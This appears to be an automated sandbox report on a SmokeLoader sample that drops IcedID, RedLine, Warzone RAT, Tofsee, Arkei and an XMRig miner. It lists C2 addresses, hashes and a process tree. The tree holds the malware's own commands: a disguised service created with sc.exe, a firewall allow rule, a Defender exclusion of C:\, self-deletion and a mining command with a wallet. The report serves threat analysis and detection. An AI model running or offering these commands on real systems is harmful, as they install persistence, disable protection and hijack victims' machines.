Analysis

  • max time kernel
    135s
  • max time network
    151s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    15-12-2021 13:24

General

  • Target

    9576c0f2c26928c2a1701c87911b87666454b2c45658b7b59588dbc207509cd5.exe

  • Size

    179KB

  • MD5

    6e6065a00fcf262ac29f2e30bef5d76c

  • SHA1

    335a53378f62cf77e4585ece9a46ba36ceadf450

  • SHA256

    9576c0f2c26928c2a1701c87911b87666454b2c45658b7b59588dbc207509cd5

  • SHA512

    282ca839d3d00e90019805d3c25418d5cc26650856784ccf048e6181a5d956e9e52df4563a35263c246b23e3560c343dedb7c09b29490bf89ec2e24d173fa4a4

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://host-data-coin-11.com/

http://file-coin-host-12.com/

http://srtuiyhuali.at/

http://fufuiloirtu.com/

http://amogohuigotuli.at/

http://novohudosovu.com/

http://brutuilionust.com/

http://bubushkalioua.com/

http://dumuilistrati.at/

http://verboliatsiaeeees.com/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

icedid

Campaign

3372020928

C2

jeliskvosh.com

Extracted

Family

tofsee

C2

mubrikych.top

oxxyfix.xyz

Extracted

Family

redline

C2

185.215.113.57:50723

Extracted

Family

warzonerat

C2

91.229.76.26:5200

Signatures

  • Arkei

    Arkei is an infostealer written in C++.

  • IcedID, BokBot

    IcedID is a banking trojan capable of stealing credentials.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 4 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

  • Windows security bypass 2 TTPs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Arkei Stealer Payload 1 IoCs
  • Warzone RAT Payload 3 IoCs
  • XMRig Miner Payload 3 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 12 IoCs
  • Modifies Installed Components in the registry 2 TTPs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Deletes itself 1 IoCs
  • Loads dropped DLL 4 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies data under HKEY_USERS 7 IoCs
  • Modifies registry class 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 44 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SendNotifyMessage 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\9576c0f2c26928c2a1701c87911b87666454b2c45658b7b59588dbc207509cd5.exe
    "C:\Users\Admin\AppData\Local\Temp\9576c0f2c26928c2a1701c87911b87666454b2c45658b7b59588dbc207509cd5.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3928
    • C:\Users\Admin\AppData\Local\Temp\9576c0f2c26928c2a1701c87911b87666454b2c45658b7b59588dbc207509cd5.exe
      "C:\Users\Admin\AppData\Local\Temp\9576c0f2c26928c2a1701c87911b87666454b2c45658b7b59588dbc207509cd5.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:832
  • C:\Users\Admin\AppData\Local\Temp\9CB9.exe
    C:\Users\Admin\AppData\Local\Temp\9CB9.exe
    1⤵
    • Executes dropped EXE
    • Checks SCSI registry key(s)
    • Suspicious behavior: MapViewOfSection
    PID:2752
  • C:\Users\Admin\AppData\Local\Temp\CAFE.exe
    C:\Users\Admin\AppData\Local\Temp\CAFE.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:620
    • C:\Users\Admin\AppData\Local\Temp\CAFE.exe
      C:\Users\Admin\AppData\Local\Temp\CAFE.exe
      2⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:1508
  • C:\Users\Admin\AppData\Local\Temp\DFEE.exe
    C:\Users\Admin\AppData\Local\Temp\DFEE.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    PID:420
  • C:\Windows\system32\regsvr32.exe
    regsvr32 /s C:\Users\Admin\AppData\Local\Temp\1BFE.dll
    1⤵
    • Loads dropped DLL
    PID:3016
  • C:\Users\Admin\AppData\Local\Temp\20D1.exe
    C:\Users\Admin\AppData\Local\Temp\20D1.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of AdjustPrivilegeToken
    PID:3900
  • C:\Windows\SysWOW64\explorer.exe
    C:\Windows\SysWOW64\explorer.exe
    1⤵
    • Accesses Microsoft Outlook profiles
    • outlook_office_path
    • outlook_win_path
    PID:2128
  • C:\Windows\explorer.exe
    C:\Windows\explorer.exe
    1⤵
      PID:2272
    • C:\Users\Admin\AppData\Local\Temp\42B2.exe
      C:\Users\Admin\AppData\Local\Temp\42B2.exe
      1⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Checks processor information in registry
      PID:3480
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\42B2.exe" & exit
        2⤵
          PID:624
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 5
            3⤵
            • Delays execution with timeout.exe
            PID:2156
      • C:\Users\Admin\AppData\Local\Temp\509E.exe
        C:\Users\Admin\AppData\Local\Temp\509E.exe
        1⤵
        • Executes dropped EXE
        • Checks SCSI registry key(s)
        • Suspicious behavior: MapViewOfSection
        PID:2204
      • C:\Users\Admin\AppData\Local\Temp\62BF.exe
        C:\Users\Admin\AppData\Local\Temp\62BF.exe
        1⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1636
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\uaqdzkrt\
          2⤵
            PID:3148
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\yhsuckfu.exe" C:\Windows\SysWOW64\uaqdzkrt\
            2⤵
              PID:2180
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" create uaqdzkrt binPath= "C:\Windows\SysWOW64\uaqdzkrt\yhsuckfu.exe /d\"C:\Users\Admin\AppData\Local\Temp\62BF.exe\"" type= own start= auto DisplayName= "wifi support"
              2⤵
                PID:3716
              • C:\Windows\SysWOW64\sc.exe
                "C:\Windows\System32\sc.exe" description uaqdzkrt "wifi internet conection"
                2⤵
                  PID:1824
                • C:\Windows\SysWOW64\sc.exe
                  "C:\Windows\System32\sc.exe" start uaqdzkrt
                  2⤵
                    PID:2996
                  • C:\Windows\SysWOW64\netsh.exe
                    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                    2⤵
                      PID:1180
                  • C:\Windows\SysWOW64\uaqdzkrt\yhsuckfu.exe
                    C:\Windows\SysWOW64\uaqdzkrt\yhsuckfu.exe /d"C:\Users\Admin\AppData\Local\Temp\62BF.exe"
                    1⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    • Suspicious use of WriteProcessMemory
                    PID:2936
                    • C:\Windows\SysWOW64\svchost.exe
                      svchost.exe
                      2⤵
                      • Drops file in System32 directory
                      • Suspicious use of SetThreadContext
                      • Modifies data under HKEY_USERS
                      PID:4044
                      • C:\Windows\SysWOW64\svchost.exe
                        svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                        3⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3900
                  • C:\Users\Admin\AppData\Local\Temp\9BC2.exe
                    C:\Users\Admin\AppData\Local\Temp\9BC2.exe
                    1⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:3652
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                      #cmd
                      2⤵
                      • Checks processor information in registry
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1920
                  • C:\Users\Admin\AppData\Local\Temp\B806.exe
                    C:\Users\Admin\AppData\Local\Temp\B806.exe
                    1⤵
                    • Executes dropped EXE
                    • Adds Run key to start application
                    PID:1708
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell Add-MpPreference -ExclusionPath C:\
                      2⤵
                        PID:3044
                      • C:\ProgramData\Reader.exe
                        "C:\ProgramData\Reader.exe"
                        2⤵
                        • Executes dropped EXE
                        PID:1828
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell Add-MpPreference -ExclusionPath C:\
                          3⤵
                            PID:4204
                      • C:\Windows\system32\WerFault.exe
                        C:\Windows\system32\WerFault.exe -u -p 3064 -s 6984
                        1⤵
                        • Program crash
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1080
                      • C:\Windows\explorer.exe
                        explorer.exe
                        1⤵
                        • Enumerates connected drives
                        • Drops file in Windows directory
                        • Modifies registry class
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of SendNotifyMessage
                        PID:1404
                      • C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                        "C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
                        1⤵
                          PID:1104
                        • C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
                          "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
                          1⤵
                            PID:3260

                          Network

                          MITRE ATT&CK Matrix ATT&CK v6

                          Persistence

                          New Service

                          1
                          T1050

                          Registry Run Keys / Startup Folder

                          3
                          T1060

                          Modify Existing Service

                          1
                          T1031

                          Privilege Escalation

                          New Service

                          1
                          T1050

                          Defense Evasion

                          Disabling Security Tools

                          1
                          T1089

                          Modify Registry

                          4
                          T1112

                          Credential Access

                          Credentials in Files

                          2
                          T1081

                          Discovery

                          Query Registry

                          4
                          T1012

                          Peripheral Device Discovery

                          2
                          T1120

                          System Information Discovery

                          4
                          T1082

                          Collection

                          Data from Local System

                          2
                          T1005

                          Email Collection

                          1
                          T1114

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\ProgramData\Reader.exe
                            MD5

                            01b3b77f485c87b65fd3750720403f7f

                            SHA1

                            6202a46a8ac5269f43accc5d13a5af96212c6e9f

                            SHA256

                            cdebe0580b1643cb346d23defb112b619cbbd6c4feaa7574270a168144e5858e

                            SHA512

                            475a52ca7ad70d5ddd9aa1f2f67dc5f98a4ce3f3a57cce025e6636928e702a9587514dfcb35729617b9f3dab139519ba3d223f144268c51bcf74b0f41f7fd485

                          • C:\ProgramData\Reader.exe
                            MD5

                            01b3b77f485c87b65fd3750720403f7f

                            SHA1

                            6202a46a8ac5269f43accc5d13a5af96212c6e9f

                            SHA256

                            cdebe0580b1643cb346d23defb112b619cbbd6c4feaa7574270a168144e5858e

                            SHA512

                            475a52ca7ad70d5ddd9aa1f2f67dc5f98a4ce3f3a57cce025e6636928e702a9587514dfcb35729617b9f3dab139519ba3d223f144268c51bcf74b0f41f7fd485

                          • C:\Users\Admin\AppData\Local\Temp\1BFE.dll
                            MD5

                            d59fa2838f83e31ef0d2bd34bd86ef40

                            SHA1

                            d9115b1a962256b6accabfee45c5654f3ee64a47

                            SHA256

                            32de1e4b5582279bf16bfcad4c55b5e0f1151afddb2a96013442b3158f4a02d8

                            SHA512

                            92a9888556706f4f3bf33e6cdfeddca958780438c73a6749e18b4a59b866b96e67c1736cf557ed470ae095c3385bb0818c4199bc00d2c088a5179029c587a93f

                          • C:\Users\Admin\AppData\Local\Temp\20D1.exe
                            MD5

                            4584bcdcd8feda7577a65fde5b0b580c

                            SHA1

                            f94702fa15477a49f42896e59633d40fb323e736

                            SHA256

                            3ece0f2d23b87308f27356cf5171781b354cc5429e07ffb7109ea321ec19ba5c

                            SHA512

                            6f6c66917a9cf367d003c956dd78cd87ee719fdeb71e3d709442fd18cefb34087d5828735b490d4c270424b9bcfd89a611ac5e47bf32c9ece51958c6d6bfef3c

                          • C:\Users\Admin\AppData\Local\Temp\20D1.exe
                            MD5

                            4584bcdcd8feda7577a65fde5b0b580c

                            SHA1

                            f94702fa15477a49f42896e59633d40fb323e736

                            SHA256

                            3ece0f2d23b87308f27356cf5171781b354cc5429e07ffb7109ea321ec19ba5c

                            SHA512

                            6f6c66917a9cf367d003c956dd78cd87ee719fdeb71e3d709442fd18cefb34087d5828735b490d4c270424b9bcfd89a611ac5e47bf32c9ece51958c6d6bfef3c

                          • C:\Users\Admin\AppData\Local\Temp\42B2.exe
                            MD5

                            15f49ec781dd3539b6fb5e5db2e44036

                            SHA1

                            75440d2fbcc1c141779bea896873d8cfc21af5ff

                            SHA256

                            dc0a8545f31d9b54a15b57568ca8609be2b2f376139866ece8d8e9112cdcbc46

                            SHA512

                            66310ea58c7a78d1513fed88f488a48e5ffc68b7e9ccd5cdf8bbaa0c10695a2da492d76a4075e0153f2f1af6a99b179c1c6d63d2f5bf843a34ed4080bbf104da

                          • C:\Users\Admin\AppData\Local\Temp\42B2.exe
                            MD5

                            15f49ec781dd3539b6fb5e5db2e44036

                            SHA1

                            75440d2fbcc1c141779bea896873d8cfc21af5ff

                            SHA256

                            dc0a8545f31d9b54a15b57568ca8609be2b2f376139866ece8d8e9112cdcbc46

                            SHA512

                            66310ea58c7a78d1513fed88f488a48e5ffc68b7e9ccd5cdf8bbaa0c10695a2da492d76a4075e0153f2f1af6a99b179c1c6d63d2f5bf843a34ed4080bbf104da

                          • C:\Users\Admin\AppData\Local\Temp\509E.exe
                            MD5

                            265ed6f79387305a37bd4a598403adf1

                            SHA1

                            c0647e1d4a77715a54141e4898bebcd322f3d9da

                            SHA256

                            1c10d4f9c74cbfb4478aa18e3430ea14c07da31ca819ffb8bea5d6e30218bff5

                            SHA512

                            1a7c615cab3ebe9910282b01bec5f5eb9558f40d716c4b0914e15d3d8b59e7d4bc37569575c8d9ba612613e1298f3f390d0bbaa153975f40ec262cea27b58b62

                          • C:\Users\Admin\AppData\Local\Temp\509E.exe
                            MD5

                            265ed6f79387305a37bd4a598403adf1

                            SHA1

                            c0647e1d4a77715a54141e4898bebcd322f3d9da

                            SHA256

                            1c10d4f9c74cbfb4478aa18e3430ea14c07da31ca819ffb8bea5d6e30218bff5

                            SHA512

                            1a7c615cab3ebe9910282b01bec5f5eb9558f40d716c4b0914e15d3d8b59e7d4bc37569575c8d9ba612613e1298f3f390d0bbaa153975f40ec262cea27b58b62

                          • C:\Users\Admin\AppData\Local\Temp\62BF.exe
                            MD5

                            abbeb38be6979e6b5f6fb32cc5f161f1

                            SHA1

                            043bbc23bb69f4505ff484899a88aa728ca7899e

                            SHA256

                            4e950aadec819bb745c9ff3224bb59d0acab439e856cab97003f92132cf13440

                            SHA512

                            0b7c229b3655da6f4a4979e3493c8fe11a4b6ac87cee03db72dd4e7e028fd5bd2aa33c625f1a496b179d8457d01e4e7d4d08f579ffbc312a930f0a5c01fd8543

                          • C:\Users\Admin\AppData\Local\Temp\62BF.exe
                            MD5

                            abbeb38be6979e6b5f6fb32cc5f161f1

                            SHA1

                            043bbc23bb69f4505ff484899a88aa728ca7899e

                            SHA256

                            4e950aadec819bb745c9ff3224bb59d0acab439e856cab97003f92132cf13440

                            SHA512

                            0b7c229b3655da6f4a4979e3493c8fe11a4b6ac87cee03db72dd4e7e028fd5bd2aa33c625f1a496b179d8457d01e4e7d4d08f579ffbc312a930f0a5c01fd8543

                          • C:\Users\Admin\AppData\Local\Temp\9BC2.exe
                            MD5

                            027861ce0112cf7149a94cbc246a1a33

                            SHA1

                            818d5e75aeecbc3c9bb4d223e36faad80f2fe79a

                            SHA256

                            c14c17020a470e53754dc2654847e9fbc6fa6f0326e515d10c6a581ad2c8825f

                            SHA512

                            5434bd03cddaeab47aee87448f77dcc49e0a21debe5c3bf5e58bf146d15fb94a56a7bcd4178f4b8c550b4fbc2b492ef4f28c97a71fa5ea8fe2bf679f19329d52

                          • C:\Users\Admin\AppData\Local\Temp\9BC2.exe
                            MD5

                            027861ce0112cf7149a94cbc246a1a33

                            SHA1

                            818d5e75aeecbc3c9bb4d223e36faad80f2fe79a

                            SHA256

                            c14c17020a470e53754dc2654847e9fbc6fa6f0326e515d10c6a581ad2c8825f

                            SHA512

                            5434bd03cddaeab47aee87448f77dcc49e0a21debe5c3bf5e58bf146d15fb94a56a7bcd4178f4b8c550b4fbc2b492ef4f28c97a71fa5ea8fe2bf679f19329d52

                          • C:\Users\Admin\AppData\Local\Temp\9CB9.exe
                            MD5

                            265ed6f79387305a37bd4a598403adf1

                            SHA1

                            c0647e1d4a77715a54141e4898bebcd322f3d9da

                            SHA256

                            1c10d4f9c74cbfb4478aa18e3430ea14c07da31ca819ffb8bea5d6e30218bff5

                            SHA512

                            1a7c615cab3ebe9910282b01bec5f5eb9558f40d716c4b0914e15d3d8b59e7d4bc37569575c8d9ba612613e1298f3f390d0bbaa153975f40ec262cea27b58b62

                          • C:\Users\Admin\AppData\Local\Temp\9CB9.exe
                            MD5

                            265ed6f79387305a37bd4a598403adf1

                            SHA1

                            c0647e1d4a77715a54141e4898bebcd322f3d9da

                            SHA256

                            1c10d4f9c74cbfb4478aa18e3430ea14c07da31ca819ffb8bea5d6e30218bff5

                            SHA512

                            1a7c615cab3ebe9910282b01bec5f5eb9558f40d716c4b0914e15d3d8b59e7d4bc37569575c8d9ba612613e1298f3f390d0bbaa153975f40ec262cea27b58b62

                          • C:\Users\Admin\AppData\Local\Temp\B806.exe
                            MD5

                            01b3b77f485c87b65fd3750720403f7f

                            SHA1

                            6202a46a8ac5269f43accc5d13a5af96212c6e9f

                            SHA256

                            cdebe0580b1643cb346d23defb112b619cbbd6c4feaa7574270a168144e5858e

                            SHA512

                            475a52ca7ad70d5ddd9aa1f2f67dc5f98a4ce3f3a57cce025e6636928e702a9587514dfcb35729617b9f3dab139519ba3d223f144268c51bcf74b0f41f7fd485

                          • C:\Users\Admin\AppData\Local\Temp\B806.exe
                            MD5

                            01b3b77f485c87b65fd3750720403f7f

                            SHA1

                            6202a46a8ac5269f43accc5d13a5af96212c6e9f

                            SHA256

                            cdebe0580b1643cb346d23defb112b619cbbd6c4feaa7574270a168144e5858e

                            SHA512

                            475a52ca7ad70d5ddd9aa1f2f67dc5f98a4ce3f3a57cce025e6636928e702a9587514dfcb35729617b9f3dab139519ba3d223f144268c51bcf74b0f41f7fd485

                          • C:\Users\Admin\AppData\Local\Temp\CAFE.exe
                            MD5

                            6e6065a00fcf262ac29f2e30bef5d76c

                            SHA1

                            335a53378f62cf77e4585ece9a46ba36ceadf450

                            SHA256

                            9576c0f2c26928c2a1701c87911b87666454b2c45658b7b59588dbc207509cd5

                            SHA512

                            282ca839d3d00e90019805d3c25418d5cc26650856784ccf048e6181a5d956e9e52df4563a35263c246b23e3560c343dedb7c09b29490bf89ec2e24d173fa4a4

                          • C:\Users\Admin\AppData\Local\Temp\CAFE.exe
                            MD5

                            6e6065a00fcf262ac29f2e30bef5d76c

                            SHA1

                            335a53378f62cf77e4585ece9a46ba36ceadf450

                            SHA256

                            9576c0f2c26928c2a1701c87911b87666454b2c45658b7b59588dbc207509cd5

                            SHA512

                            282ca839d3d00e90019805d3c25418d5cc26650856784ccf048e6181a5d956e9e52df4563a35263c246b23e3560c343dedb7c09b29490bf89ec2e24d173fa4a4

                          • C:\Users\Admin\AppData\Local\Temp\CAFE.exe
                            MD5

                            6e6065a00fcf262ac29f2e30bef5d76c

                            SHA1

                            335a53378f62cf77e4585ece9a46ba36ceadf450

                            SHA256

                            9576c0f2c26928c2a1701c87911b87666454b2c45658b7b59588dbc207509cd5

                            SHA512

                            282ca839d3d00e90019805d3c25418d5cc26650856784ccf048e6181a5d956e9e52df4563a35263c246b23e3560c343dedb7c09b29490bf89ec2e24d173fa4a4

                          • C:\Users\Admin\AppData\Local\Temp\DFEE.exe
                            MD5

                            0cefed061e2a2241ecd302d7790a2f80

                            SHA1

                            5f119195af2db118c5fbac21634bea00f5d5b8da

                            SHA256

                            014ad60fd2c294dd8fb63c022961e17df1ba74bb1209a64634112913edc44983

                            SHA512

                            7b7e4460dad4f176b11a66a37bbc1b2fd2c7e042c5e949c72edcc3c93d9bb9d210d8ecc95d8aad533c761947958e008c4ced8b5faef9319ebb5bf29752381cba

                          • C:\Users\Admin\AppData\Local\Temp\DFEE.exe
                            MD5

                            0cefed061e2a2241ecd302d7790a2f80

                            SHA1

                            5f119195af2db118c5fbac21634bea00f5d5b8da

                            SHA256

                            014ad60fd2c294dd8fb63c022961e17df1ba74bb1209a64634112913edc44983

                            SHA512

                            7b7e4460dad4f176b11a66a37bbc1b2fd2c7e042c5e949c72edcc3c93d9bb9d210d8ecc95d8aad533c761947958e008c4ced8b5faef9319ebb5bf29752381cba

                          • C:\Users\Admin\AppData\Local\Temp\yhsuckfu.exe
                            MD5

                            1600da51f3708f65c9f2ed555c599d72

                            SHA1

                            dfb53477912d6ba16b655e85cc6e006b29cedb15

                            SHA256

                            4697b1177b9ac027d0b889caac044f35fea0a092e21884f8206d8b4c025869af

                            SHA512

                            ddb64a795ecc15d17da21468e3d5269d329869f7ff19f99b16ac593a89eef4aa6505f1f1aedb983e4e36cbc0f84143ec89f58d331bf05705e821d090eba6b483

                          • C:\Windows\SysWOW64\uaqdzkrt\yhsuckfu.exe
                            MD5

                            1600da51f3708f65c9f2ed555c599d72

                            SHA1

                            dfb53477912d6ba16b655e85cc6e006b29cedb15

                            SHA256

                            4697b1177b9ac027d0b889caac044f35fea0a092e21884f8206d8b4c025869af

                            SHA512

                            ddb64a795ecc15d17da21468e3d5269d329869f7ff19f99b16ac593a89eef4aa6505f1f1aedb983e4e36cbc0f84143ec89f58d331bf05705e821d090eba6b483

                          • \ProgramData\mozglue.dll
                            MD5

                            8f73c08a9660691143661bf7332c3c27

                            SHA1

                            37fa65dd737c50fda710fdbde89e51374d0c204a

                            SHA256

                            3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

                            SHA512

                            0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

                          • \ProgramData\nss3.dll
                            MD5

                            bfac4e3c5908856ba17d41edcd455a51

                            SHA1

                            8eec7e888767aa9e4cca8ff246eb2aacb9170428

                            SHA256

                            e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                            SHA512

                            2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                          • \ProgramData\sqlite3.dll
                            MD5

                            e477a96c8f2b18d6b5c27bde49c990bf

                            SHA1

                            e980c9bf41330d1e5bd04556db4646a0210f7409

                            SHA256

                            16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660

                            SHA512

                            335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

                          • \Users\Admin\AppData\Local\Temp\1BFE.dll
                            MD5

                            d59fa2838f83e31ef0d2bd34bd86ef40

                            SHA1

                            d9115b1a962256b6accabfee45c5654f3ee64a47

                            SHA256

                            32de1e4b5582279bf16bfcad4c55b5e0f1151afddb2a96013442b3158f4a02d8

                            SHA512

                            92a9888556706f4f3bf33e6cdfeddca958780438c73a6749e18b4a59b866b96e67c1736cf557ed470ae095c3385bb0818c4199bc00d2c088a5179029c587a93f

                          • memory/420-137-0x00000000000C0000-0x0000000000129000-memory.dmp
                            Filesize

                            420KB

                          • memory/420-139-0x0000000074F40000-0x0000000075102000-memory.dmp
                            Filesize

                            1.8MB

                          • memory/420-148-0x0000000005340000-0x0000000005341000-memory.dmp
                            Filesize

                            4KB

                          • memory/420-149-0x0000000075610000-0x0000000075B94000-memory.dmp
                            Filesize

                            5.5MB

                          • memory/420-151-0x0000000005460000-0x0000000005461000-memory.dmp
                            Filesize

                            4KB

                          • memory/420-150-0x0000000075E00000-0x0000000077148000-memory.dmp
                            Filesize

                            19.3MB

                          • memory/420-152-0x0000000005380000-0x0000000005381000-memory.dmp
                            Filesize

                            4KB

                          • memory/420-153-0x000000006FEB0000-0x000000006FEFB000-memory.dmp
                            Filesize

                            300KB

                          • memory/420-147-0x0000000005470000-0x0000000005471000-memory.dmp
                            Filesize

                            4KB

                          • memory/420-134-0x0000000000000000-mapping.dmp
                          • memory/420-146-0x00000000052E0000-0x00000000052E1000-memory.dmp
                            Filesize

                            4KB

                          • memory/420-145-0x0000000005A80000-0x0000000005A81000-memory.dmp
                            Filesize

                            4KB

                          • memory/420-144-0x0000000071C60000-0x0000000071CE0000-memory.dmp
                            Filesize

                            512KB

                          • memory/420-142-0x00000000000C0000-0x00000000000C1000-memory.dmp
                            Filesize

                            4KB

                          • memory/420-141-0x0000000075C60000-0x0000000075D51000-memory.dmp
                            Filesize

                            964KB

                          • memory/420-140-0x0000000002880000-0x00000000028C5000-memory.dmp
                            Filesize

                            276KB

                          • memory/420-138-0x0000000000D60000-0x0000000000D61000-memory.dmp
                            Filesize

                            4KB

                          • memory/620-133-0x0000000000820000-0x000000000096A000-memory.dmp
                            Filesize

                            1.3MB

                          • memory/620-127-0x0000000000000000-mapping.dmp
                          • memory/624-264-0x0000000000000000-mapping.dmp
                          • memory/832-116-0x0000000000402F47-mapping.dmp
                          • memory/832-115-0x0000000000400000-0x0000000000409000-memory.dmp
                            Filesize

                            36KB

                          • memory/1180-219-0x0000000000000000-mapping.dmp
                          • memory/1508-131-0x0000000000402F47-mapping.dmp
                          • memory/1636-208-0x0000000000030000-0x000000000003D000-memory.dmp
                            Filesize

                            52KB

                          • memory/1636-211-0x0000000000400000-0x0000000000823000-memory.dmp
                            Filesize

                            4.1MB

                          • memory/1636-202-0x0000000000000000-mapping.dmp
                          • memory/1636-209-0x0000000000900000-0x0000000000913000-memory.dmp
                            Filesize

                            76KB

                          • memory/1708-260-0x0000000002140000-0x000000000215E000-memory.dmp
                            Filesize

                            120KB

                          • memory/1708-246-0x0000000000000000-mapping.dmp
                          • memory/1708-261-0x0000000000400000-0x0000000000554000-memory.dmp
                            Filesize

                            1.3MB

                          • memory/1824-216-0x0000000000000000-mapping.dmp
                          • memory/1828-268-0x0000000000000000-mapping.dmp
                          • memory/1828-312-0x0000000000400000-0x0000000000554000-memory.dmp
                            Filesize

                            1.3MB

                          • memory/1920-235-0x0000000000400000-0x0000000000420000-memory.dmp
                            Filesize

                            128KB

                          • memory/1920-236-0x000000000041BAFE-mapping.dmp
                          • memory/1920-243-0x0000000005380000-0x0000000005986000-memory.dmp
                            Filesize

                            6.0MB

                          • memory/2128-181-0x0000000000E00000-0x0000000000E6B000-memory.dmp
                            Filesize

                            428KB

                          • memory/2128-180-0x0000000000E70000-0x0000000000EE4000-memory.dmp
                            Filesize

                            464KB

                          • memory/2128-177-0x0000000000000000-mapping.dmp
                          • memory/2156-265-0x0000000000000000-mapping.dmp
                          • memory/2180-213-0x0000000000000000-mapping.dmp
                          • memory/2204-193-0x0000000000000000-mapping.dmp
                          • memory/2204-207-0x0000000000400000-0x00000000004CD000-memory.dmp
                            Filesize

                            820KB

                          • memory/2204-206-0x00000000004D0000-0x000000000061A000-memory.dmp
                            Filesize

                            1.3MB

                          • memory/2204-205-0x0000000000796000-0x00000000007A7000-memory.dmp
                            Filesize

                            68KB

